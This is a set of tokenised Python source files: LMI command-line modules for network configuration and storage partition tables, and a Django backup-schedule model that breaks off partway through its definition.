<s> """<STR_LIT>""" <EOL> from lmi . scripts . common import command <EOL> from lmi . scripts . common import errors <EOL> from lmi . scripts . common . formatter import command as fcmd <EOL> from lmi . scripts . networking import * <EOL> def cmd_list_devices ( ns , device_names = None ) : <EOL> """<STR_LIT>""" <EOL> for d in list_devices ( ns , device_names ) : <EOL> yield ( d . ElementName , ns . LMI_IPNetworkConnection . OperatingStatusValues . value_name ( d . OperatingStatus ) , get_mac ( ns , d ) ) <EOL> def cmd_show_devices ( ns , device_names = None ) : <EOL> """<STR_LIT>""" <EOL> for device in list_devices ( ns , device_names ) : <EOL> yield fcmd . NewTableCommand ( title = "<STR_LIT>" % device . ElementName ) <EOL> yield ( "<STR_LIT>" , ns . LMI_IPNetworkConnection . OperatingStatusValues . value_name ( device . OperatingStatus ) ) <EOL> yield ( "<STR_LIT>" , get_mac ( ns , device ) ) <EOL> for ip , prefix in get_ipv4_addresses ( ns , device ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( ip , prefix ) ) <EOL> for ip , mask in get_ipv6_addresses ( ns , device ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( ip , mask ) ) <EOL> for gw in get_default_gateways ( ns , device ) : <EOL> yield ( "<STR_LIT>" , gw ) <EOL> for dns in get_dns_servers ( ns , device ) : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> for setting in get_active_settings ( ns , device ) : <EOL> yield ( "<STR_LIT>" , setting . Caption ) <EOL> for setting in get_available_settings ( ns , device ) : <EOL> yield ( "<STR_LIT>" , setting . Caption ) <EOL> class ListDevice ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class ShowDevice ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = [ ] <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class Device ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { '<STR_LIT:list>' : ListDevice , '<STR_LIT>' : ShowDevice } <EOL> OWN_USAGE = True <EOL> SETTING_TYPE_DESC = { <EOL> SETTING_TYPE_UNKNOWN : '<STR_LIT>' , <EOL> SETTING_TYPE_ETHERNET : '<STR_LIT>' , <EOL> SETTING_TYPE_BRIDGE_MASTER : '<STR_LIT>' , <EOL> SETTING_TYPE_BRIDGE_SLAVE : '<STR_LIT>' , <EOL> SETTING_TYPE_BOND_MASTER : '<STR_LIT>' , <EOL> SETTING_TYPE_BOND_SLAVE : '<STR_LIT>' , <EOL> } <EOL> SETTING_IP_METHOD_DESC = { <EOL> SETTING_IP_METHOD_DISABLED : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_DHCP : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_STATIC : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_STATELESS : '<STR_LIT>' , <EOL> SETTING_IP_METHOD_DHCPv6 : '<STR_LIT>' <EOL> } <EOL> SETTING_IPv4_METHODS = { <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DISABLED , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DHCP , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_STATIC <EOL> } <EOL> SETTING_IPv6_METHODS = { <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DISABLED , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_DHCPv6 , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_STATIC , <EOL> "<STR_LIT>" : SETTING_IP_METHOD_STATELESS <EOL> } <EOL> def cmd_list_settings ( ns , captions = None ) : <EOL> for setting in list_settings ( ns , captions ) : <EOL> yield ( setting . Caption , SETTING_TYPE_DESC . get ( get_setting_type ( ns , setting ) , '<STR_LIT>' ) ) <EOL> def cmd_show_settings ( ns , captions = None ) : <EOL> for setting in list_settings ( ns , captions ) : <EOL> yield fcmd . NewTableCommand ( title = "<STR_LIT>" % setting . Caption ) <EOL> if setting . classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> elif setting . classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> yield ( "<STR_LIT>" , setting . InterfaceName ) <EOL> yield ( "<STR_LIT>" , setting . MIIMon ) <EOL> yield ( "<STR_LIT>" , ns . LMI_BondingMasterSettingData . ModeValues . value_name ( setting . Mode ) ) <EOL> yield ( "<STR_LIT>" , setting . UpDelay ) <EOL> yield ( "<STR_LIT>" , setting . DownDelay ) <EOL> yield ( "<STR_LIT>" , setting . ARPInterval ) <EOL> if len ( setting . ARPIPTarget ) > <NUM_LIT:0> : <EOL> yield ( "<STR_LIT>" , "<STR_LIT:U+002CU+0020>" . join ( setting . ARPIPTarget ) ) <EOL> elif setting . classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> elif setting . classname == "<STR_LIT>" : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> yield ( "<STR_LIT>" , setting . InterfaceName ) <EOL> ip4method = get_setting_ip4_method ( ns , setting ) <EOL> if ip4method != SETTING_IP_METHOD_DISABLED : <EOL> yield ( "<STR_LIT>" , SETTING_IP_METHOD_DESC . get ( ip4method , '<STR_LIT>' ) ) <EOL> ip6method = get_setting_ip6_method ( ns , setting ) <EOL> if ip6method != SETTING_IP_METHOD_DISABLED : <EOL> yield ( "<STR_LIT>" , SETTING_IP_METHOD_DESC . get ( ip6method , '<STR_LIT>' ) ) <EOL> for subsetting in get_sub_setting ( ns , setting ) : <EOL> if subsetting . classname == '<STR_LIT>' : <EOL> if subsetting . ProtocolIFType == ns . LMI_ExtendedStaticIPAssignmentSettingData . ProtocolIFTypeValues . IPv4 : <EOL> version = "<STR_LIT>" <EOL> masks = subsetting . SubnetMasks <EOL> else : <EOL> version = "<STR_LIT>" <EOL> masks = subsetting . IPv6SubnetPrefixLengths <EOL> for i in range ( len ( subsetting . IPAddresses ) ) : <EOL> mask = masks [ i ] if i < len ( masks ) else "<STR_LIT>" <EOL> gateway = subsetting . GatewayAddresses [ i ] if i < len ( subsetting . GatewayAddresses ) else None <EOL> if i < len ( subsetting . GatewayAddresses ) and len ( subsetting . GatewayAddresses [ i ] ) > <NUM_LIT:0> : <EOL> yield ( "<STR_LIT>" % version , "<STR_LIT>" % ( subsetting . IPAddresses [ i ] , mask , subsetting . GatewayAddresses [ i ] ) ) <EOL> else : <EOL> yield ( "<STR_LIT>" % version , "<STR_LIT>" % ( subsetting . IPAddresses [ i ] , mask ) ) <EOL> elif subsetting . classname == '<STR_LIT>' : <EOL> for dns in subsetting . DNSServerAddresses : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> elif subsetting . classname in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> yield ( "<STR_LIT>" , subsetting . Caption ) <EOL> elif subsetting . classname in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> yield ( "<STR_LIT>" , subsetting . Caption ) <EOL> if setting . classname not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> for device in get_applicable_devices ( ns , setting ) : <EOL> yield ( "<STR_LIT>" , device . ElementName ) <EOL> if is_setting_active ( ns , setting ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if get_autoconnect ( ns , setting ) : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for route in get_static_routes ( ns , setting ) : <EOL> if route . AddressType == ns . LMI_IPRouteSettingData . AddressTypeValues . IPv4 : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( route . DestinationAddress , route . DestinationMask , route . RouteMetric , route . NextHop ) ) <EOL> else : <EOL> yield ( "<STR_LIT>" , "<STR_LIT>" % ( route . DestinationAddress , route . PrefixLength , route . RouteMetric , route . NextHop ) ) <EOL> def cmd_activate ( ns , caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> if device_name : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> else : <EOL> device = None <EOL> return activate ( ns , setting , device ) <EOL> def cmd_deactivate ( ns , caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> if device_name : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> else : <EOL> device = None <EOL> return deactivate ( ns , setting , device ) <EOL> class Activate ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_activate ( ns , caption , device_name ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> class Deactivate ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_deactivate ( ns , caption , device_name ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> def cmd_set_autoconnect ( ns , caption , device_name , enable ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> device = None <EOL> if device_name is not None : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> return set_autoconnect ( ns , setting , device , enable ) <EOL> class EnableAutoconnect ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_set_autoconnect ( ns , caption , device_name , True ) <EOL> class DisableAutoconnect ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name ) : <EOL> return cmd_set_autoconnect ( ns , caption , device_name , False ) <EOL> class ShowAutoconnect ( command . LmiLister ) : <EOL> def execute ( self , ns , caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> device = None <EOL> if device_name is not None : <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> if get_autoconnect ( ns , setting , device ) : <EOL> yield ( "<STR_LIT>" % caption , ) <EOL> else : <EOL> yield ( "<STR_LIT>" % caption , ) <EOL> class Autoconnect ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { '<STR_LIT>' : ShowAutoconnect , '<STR_LIT>' : EnableAutoconnect , '<STR_LIT>' : DisableAutoconnect } <EOL> OWN_USAGE = True <EOL> class ListSetting ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class ShowSetting ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = [ ] <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> class CreateSetting ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , device_name , _ethernet , _bridging , _bonding , _ipv4 , _ipv6 ) : <EOL> type = SETTING_TYPE_ETHERNET <EOL> if _bridging : <EOL> type = SETTING_TYPE_BRIDGE_MASTER <EOL> elif _bonding : <EOL> type = SETTING_TYPE_BOND_MASTER <EOL> if _ipv4 not in SETTING_IPv4_METHODS : <EOL> raise errors . LmiInvalidOptions ( "<STR_LIT>" % _ipv4 ) <EOL> if _ipv6 not in SETTING_IPv6_METHODS : <EOL> raise errors . LmiInvalidOptions ( "<STR_LIT>" % _ipv6 ) <EOL> ipv4_method = SETTING_IPv4_METHODS [ _ipv4 ] <EOL> ipv6_method = SETTING_IPv6_METHODS [ _ipv6 ] <EOL> device = get_device_by_name ( ns , device_name ) <EOL> if device is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % device_name ) <EOL> create_setting ( ns , caption , device , type , ipv4_method , ipv6_method ) <EOL> return <NUM_LIT:0> <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> class DeleteSetting ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return delete_setting ( ns , setting ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> class Setting ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { '<STR_LIT:list>' : ListSetting , '<STR_LIT>' : ShowSetting , '<STR_LIT>' : CreateSetting , '<STR_LIT>' : DeleteSetting } <EOL> OWN_USAGE = True <EOL> def cmd_list_address ( ns , caption = None ) : <EOL> for setting in list_settings ( ns , caption ) : <EOL> for subsetting in get_sub_setting ( ns , setting ) : <EOL> if subsetting . classname == '<STR_LIT>' : <EOL> for i , address in enumerate ( subsetting . IPAddresses ) : <EOL> if subsetting . ProtocolIFType == ns . LMI_ExtendedStaticIPAssignmentSettingData . ProtocolIFTypeValues . IPv4 : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> address , <EOL> subsetting . SubnetMasks [ i ] , <EOL> subsetting . GatewayAddresses [ i ] ) <EOL> else : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> address , <EOL> subsetting . IPv6SubnetPrefixLengths [ i ] , <EOL> subsetting . GatewayAddresses [ i ] ) <EOL> class ListAddress ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddAddress ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , gateway ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return add_ip_address ( ns , setting , address , prefix , gateway ) <EOL> class RemoveAddress ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return remove_ip_address ( ns , setting , address ) <EOL> class ReplaceAddress ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , gateway ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return replace_ip_address ( ns , setting , address , prefix , gateway ) <EOL> class Address ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : ListAddress , <EOL> '<STR_LIT>' : AddAddress , <EOL> '<STR_LIT>' : RemoveAddress , <EOL> '<STR_LIT:replace>' : ReplaceAddress <EOL> } <EOL> OWN_USAGE = True <EOL> def cmd_list_route ( ns , caption = None ) : <EOL> for setting in list_settings ( ns , caption ) : <EOL> for route in get_static_routes ( ns , setting ) : <EOL> if route . AddressType == ns . LMI_IPRouteSettingData . AddressTypeValues . IPv4 : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> route . DestinationAddress , <EOL> route . DestinationMask , <EOL> route . RouteMetric , <EOL> route . NextHop ) <EOL> else : <EOL> yield ( <EOL> "<STR_LIT>" , <EOL> route . DestinationAddress , <EOL> route . PrefixLength , <EOL> route . RouteMetric , <EOL> route . NextHop ) <EOL> class ListRoute ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddRoute ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , metric , next_hop ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return add_static_route ( ns , setting , address , prefix , metric , next_hop ) <EOL> class RemoveRoute ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return remove_static_route ( ns , setting , address ) <EOL> class ReplaceRoute ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address , prefix , metric , next_hop ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return replace_static_route ( ns , setting , address , prefix , metric , next_hop ) <EOL> class Route ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : ListRoute , <EOL> '<STR_LIT>' : AddRoute , <EOL> '<STR_LIT>' : RemoveRoute , <EOL> '<STR_LIT:replace>' : ReplaceRoute <EOL> } <EOL> OWN_USAGE = True <EOL> def cmd_list_dns ( ns , caption = None ) : <EOL> for setting in list_settings ( ns , caption ) : <EOL> for subsetting in get_sub_setting ( ns , setting ) : <EOL> if subsetting . classname == '<STR_LIT>' : <EOL> for dns in subsetting . DNSServerAddresses : <EOL> if subsetting . ProtocolIFType == ns . LMI_DNSSettingData . ProtocolIFTypeValues . IPv4 : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> else : <EOL> yield ( "<STR_LIT>" , dns ) <EOL> class ListDns ( command . LmiLister ) : <EOL> CALLABLE = '<STR_LIT>' <EOL> COLUMNS = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddDns ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return add_dns_server ( ns , setting , address ) <EOL> class RemoveDns ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return remove_dns_server ( ns , setting , address ) <EOL> class ReplaceDns ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , caption , address ) : <EOL> setting = get_setting_by_caption ( ns , caption ) <EOL> if setting is None : <EOL> raise errors . LmiFailed ( "<STR_LIT>" % caption ) <EOL> return replace_dns_server ( ns , setting , address ) <EOL> class Dns ( command . LmiCommandMultiplexer ) : <EOL> """<STR_LIT>""" <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : ListDns , <EOL> '<STR_LIT>' : AddDns , <EOL> '<STR_LIT>' : RemoveDns , <EOL> '<STR_LIT:replace>' : ReplaceDns <EOL> } <EOL> OWN_USAGE = True <EOL> class Enslave ( command . LmiCheckResult ) : <EOL> EXPECT = <NUM_LIT:0> <EOL> def execute ( self , ns , master_caption , device_name ) : <EOL> setting = get_setting_by_caption ( ns , master_caption ) <EOL> device = get_device_by_name ( ns , device_name ) <EOL> return enslave ( ns , setting , device ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in options and len ( options [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> Networking = command . register_subcommands ( <EOL> '<STR_LIT>' , __doc__ , <EOL> { <EOL> '<STR_LIT>' : Device , <EOL> '<STR_LIT>' : Setting , <EOL> '<STR_LIT>' : Activate , <EOL> '<STR_LIT>' : Deactivate , <EOL> '<STR_LIT>' : Autoconnect , <EOL> '<STR_LIT>' : Enslave , <EOL> '<STR_LIT:address>' : Address , <EOL> '<STR_LIT>' : Route , <EOL> '<STR_LIT>' : Dns <EOL> } , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from lmi . shell . LMIUtil import lmi_isinstance <EOL> from lmi . scripts . common import command <EOL> from lmi . scripts . common import get_logger <EOL> from lmi . scripts . common . formatter import command as fcmd <EOL> from lmi . scripts . storage import show , fs , lvm , mount , raid , partition <EOL> from lmi . scripts . storage . common import ( size2str , get_devices , get_children , <EOL> get_parents , str2device , str2size , str2vg ) <EOL> LOG = get_logger ( __name__ ) <EOL> class PartitionTableList ( command . LmiLister ) : <EOL> COLUMNS = ( '<STR_LIT:Name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> def execute ( self , ns , devices = None ) : <EOL> """<STR_LIT>""" <EOL> cls = ns . LMI_DiskPartitionConfigurationCapabilities <EOL> for ( device , table ) in partition . get_partition_tables ( ns , devices ) : <EOL> LOG ( ) . debug ( "<STR_LIT>" , device . Name ) <EOL> largest_size = partition . get_largest_partition_size ( ns , device ) <EOL> largest_size = size2str ( largest_size , <EOL> self . app . config . human_friendly ) <EOL> if table . PartitionStyle == cls . PartitionStyleValues . MBR : <EOL> table_type = "<STR_LIT>" <EOL> else : <EOL> table_type = cls . PartitionStyleValues . value_name ( <EOL> table . PartitionStyle ) <EOL> yield ( device . Name , table_type , largest_size ) <EOL> class PartitionTableCreate ( command . LmiCheckResult ) : <EOL> EXPECT = None <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> def execute ( self , ns , devices , _gpt , _msdos ) : <EOL> """<STR_LIT>""" <EOL> if _msdos : <EOL> ptype = partition . PARTITION_TABLE_TYPE_MSDOS <EOL> else : <EOL> ptype = partition . PARTITION_TABLE_TYPE_GPT <EOL> for device in devices : <EOL> partition . create_partition_table ( ns , device , ptype ) <EOL> class PartitionTableShow ( command . LmiLister ) : <EOL> COLUMNS = ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> def transform_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> options [ '<STR_LIT>' ] = options . pop ( '<STR_LIT>' ) <EOL> def execute ( self , ns , devices = None ) : <EOL> """<STR_LIT>""" <EOL> if not devices : <EOL> ret = partition . get_partition_tables ( ns ) <EOL> devices = [ i [ <NUM_LIT:0> ] for i in ret ] <EOL> for device in devices : <EOL> device = str2device ( ns , device ) <EOL> cmd = fcmd . NewTableCommand ( title = device . DeviceID ) <EOL> yield cmd <EOL> for line in show . partition_table_show ( <EOL> ns , device , self . app . config . human_friendly ) : <EOL> yield line <EOL> class PartitionTable ( command . LmiCommandMultiplexer ) : <EOL> OWN_USAGE = __doc__ <EOL> COMMANDS = { <EOL> '<STR_LIT:list>' : PartitionTableList , <EOL> '<STR_LIT>' : PartitionTableCreate , <EOL> '<STR_LIT>' : PartitionTableShow , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from datetime import datetime , timedelta <EOL> import logging <EOL> import pytz <EOL> from croniter . croniter import croniter <EOL> from django . db import models <EOL> from django . utils import timezone as django_timezone <EOL> from django . utils import six <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> from django . contrib . contenttypes import models as ct_models <EOL> from django . contrib . contenttypes import fields as ct_fields <EOL> from django_fsm import transition , FSMIntegerField <EOL> from jsonfield import JSONField <EOL> from nodeconductor . core import models as core_models <EOL> from nodeconductor . core import fields as core_fields <EOL> from nodeconductor . backup import managers , exceptions , utils <EOL> from nodeconductor . logging . loggers import LoggableMixin <EOL> logger = logging . getLogger ( __name__ ) <EOL> class BackupSourceAbstractModel ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> content_type = models . ForeignKey ( ct_models . ContentType ) <EOL> object_id = models . PositiveIntegerField ( ) <EOL> backup_source = ct_fields . GenericForeignKey ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Meta ( object ) : <EOL> abstract = True <EOL> @ python_2_unicode_compatible <EOL> class BackupSchedule ( core_models . UuidMixin , <EOL> core_models . DescribableMixin , <EOL> LoggableMixin , <EOL> BackupSourceAbstractModel ) : <EOL> """<STR_LIT>""" <EOL> retention_time = models . PositiveIntegerField ( <EOL> help_text = '<STR_LIT>' ) <EOL> maximal_number_of_backups = models . PositiveSmallIntegerField ( ) <EOL> schedule = core_fields . CronScheduleField ( max_length = <NUM_LIT:15> ) <EOL> next_trigger_at = models . DateTimeField ( null = True ) <EOL> is_active = models . BooleanField ( default = False ) <EOL> timezone = models . CharField ( max_length = <NUM_LIT:50> , default = django_timezone . get_current_timezone_name ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % { <EOL> '<STR_LIT>' : self . uuid , <EOL> '<STR_LIT:object>' : self . backup_source , <EOL> '<STR_LIT>' : self . schedule , <EOL> } <EOL> def _update_next_trigger_at ( self ) : <EOL> """<STR_LIT>""" <EOL> base_time = django_timezone . now ( ) . replace ( tzinfo = pytz . timezone ( self . timezone ) ) <EOL> self . next_trigger_at = croniter ( self . schedule , base_time ) . get_next ( datetime ) <EOL> def _check_backup_source_state ( self ) : <EOL> """<STR_LIT>""" <EOL> state = self . backup_source . state <EOL> if state not in self . backup_source . States . STABLE_STATES : <EOL> logger . warning ( '<STR_LIT>' % ( self . backup_source , state ) ) <EOL> return False <EOL> return True <EOL> def _create_backup ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _check_backup_source_state ( ) : <EOL> return <EOL> kept_until = django_timezone . now ( ) + timedelta ( days = self . retention_time ) if self . retention_time else None <EOL> backup = Backup . objects . create ( <EOL> backup_schedule = self , <EOL> backup_source = self . backup_source , <EOL> kept_until = kept_until , <EOL> description = '<STR_LIT>' ) <EOL> backup . start_backup ( ) <EOL> return backup <EOL> def _delete_extra_backups ( self ) : <EOL> """<STR_LIT>""" <EOL> exclude_states = ( Backup . States . DELETING , Backup . States . DELETED , Backup . States . ERRED ) <EOL> backups_count = self . backups . exclude ( state__in = exclude_states ) . count ( ) <EOL> extra_backups_count = backups_count - self . maximal_number_of_backups <EOL> if extra_backups_count > <NUM_LIT:0> : <EOL> for backup in self . backups . order_by ( '<STR_LIT>' ) [ : extra_backups_count ] : <EOL> backup . start_deletion ( ) <EOL> def execute ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _create_backup ( ) <EOL> self . _delete_extra_backups ( ) <EOL> self . _update_next_trigger_at ( ) <EOL> self . save ( ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> prev_instance = BackupSchedule . objects . get ( pk = self . pk ) <EOL> except BackupSchedule . DoesNotExist : <EOL> prev_instance = None <EOL> if prev_instance is None or ( not prev_instance . is_active and self . is_active or <EOL> self . schedule != prev_instance . schedule ) : <EOL> self . _update_next_trigger_at ( ) <EOL> super ( BackupSchedule , self ) . save ( * args , ** kwargs ) <EOL> def get_log_fields ( self ) : <EOL> return ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> @ python_2_unicode_compatible <EOL> class Backup ( core_models . UuidMixin , <EOL> core_models . DescribableMixin , <EOL> LoggableMixin , <EOL> BackupSourceAbstractModel ) : <EOL> """<STR_LIT>""" <EOL> backup_schedule = models . ForeignKey ( BackupSchedule , blank = True , null = True , <EOL> on_delete = models . SET_NULL , <EOL> related_name = '<STR_LIT>' ) <EOL> kept_until = models . DateTimeField ( <EOL> null = True , <EOL> blank = True , <EOL> help_text = '<STR_LIT>' ) <EOL> created_at = models . DateTimeField ( auto_now_add = True ) <EOL> class States ( object ) : <EOL> READY = <NUM_LIT:1> 